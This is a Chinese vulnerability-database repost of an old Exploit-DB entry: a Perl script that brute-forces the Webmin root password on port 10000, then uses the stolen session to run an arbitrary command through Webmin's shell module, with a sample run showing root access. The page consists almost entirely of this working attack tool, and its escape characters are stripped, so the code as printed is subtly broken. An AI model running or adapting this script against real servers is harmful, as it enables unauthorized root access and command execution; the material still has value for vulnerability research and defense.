Webmin – Brute Force / Command Execution

Webmin – Brute Force / Command Execution

漏洞ID 1054839 漏洞类型
发布时间 2004-12-22 更新时间 2004-12-22
图片[1]-Webmin – Brute Force / Command Execution-安全小百科CVE编号 N/A
图片[2]-Webmin – Brute Force / Command Execution-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/705
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
##
# Webmin BruteForce + Command execution - By Di42lo <[email protected]>
# 
# usage 
# ./bruteforce.webmin.pl <host> <command>
#
#./bruteforce.webmin.pl 192.168.0.5 "uptime"
# [+] BruteForcing...
# [+] trying to enter with: admim
# [+] trying to enter with: admin
# [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb
# [+] Password : admin
# [+] Connecting to host once again
# [+] Connected.. Sending Buffer
# [+] Buffer sent...running command uptime
# root logged into Webmin 1.170 on linux (SuSE Linux 9.1)
# 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01

use IO::Socket;
if (@ARGV<2){ print "Webmin BruteForcernusage:n$0 <host> <command>n"; exit; }
my $host=$ARGV[0];
my $cmd=$ARGV[1];
#start pass:
my $pass="a";
my $chk=0;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000")
|| die "[-] Webmin on this host does not existrn";
$sock->close;
print "[+] BruteForcing...n";
my $sid;
while ($chk!=1) {
$pass++;
my $pass_line="page=%2F&user=root&pass=$pass";
my $buffer="POST /session_login.cgi HTTP/1.0n".
"Host: $host:10000n".
"Keep-Alive: 300n".
"Connection: keep-aliven".
"Referer: http://$host:10000/n".
"Cookie: testing=1n".
"Content-Type: application/x-www-form-urlencodedn".
"Content-Length: __n".
"n".
$pass_line."nn";
my $line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000");
if ($sock)
{
print "[+] trying to enter with: $passn";
print $sock $buffer;
while ($answer=<$sock>)
{
if ($answer=~/sid=(.*);/g)
{
$chk=1;
$sid=$1;
print "[+] Found SID : $sidn";
print "[+] Password : $passn";
}
}
}
$sock->close;
}
print "[+] Connecting to host once againn";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000") ||
die "[-] Cant Connect once again for command executionn";
print "[+] Connected.. Sending Buffern";
my $temp="-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="cmd"n".
"n".
"$cmdn".
"-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="pwd"n".
"n".
"/rootn".
"-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="history"n".
"n".
"n".
"-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="previous"n".
"n".
"$cmdn".
"-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="pcmd"n".
"n".
"$cmdn".
"-----------------------------19777347561180971495777867604--nn";
my $buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1n".
"Host: $host:10000n".
"Keep-Alive: 300n".
"Connection: keep-aliven".
"Referer: http://$host:10000/shell/n".
"Cookie: sid=$sid; testing=1; xn".
"Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604n".
"Content-Length: sizn".
"n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;

if ($sock)
{
print "[+] Buffer sent...running command $cmdn";
print $sock $buffer;

while ($answer=<$sock>)
{
#print $answer;
if ($answer=~/defaultStatus="(.*)";/g) { print $1."n";}
if ($answer=~/<td><pre><b>>/g)
{
$cmd_chk=1;
}
if ($cmd_chk==1) 
{ 
if ($answer=~/</pre></td></tr>/g)
{
exit;
} else { print $answer; }
}
}
} 

# milw0rm.com [2004-12-22]

相关推荐: Qualcomm Eudora Embedded Hyperlink URI Obfuscation Weakness

Qualcomm Eudora Embedded Hyperlink URI Obfuscation Weakness 漏洞ID 1098471 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2004-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享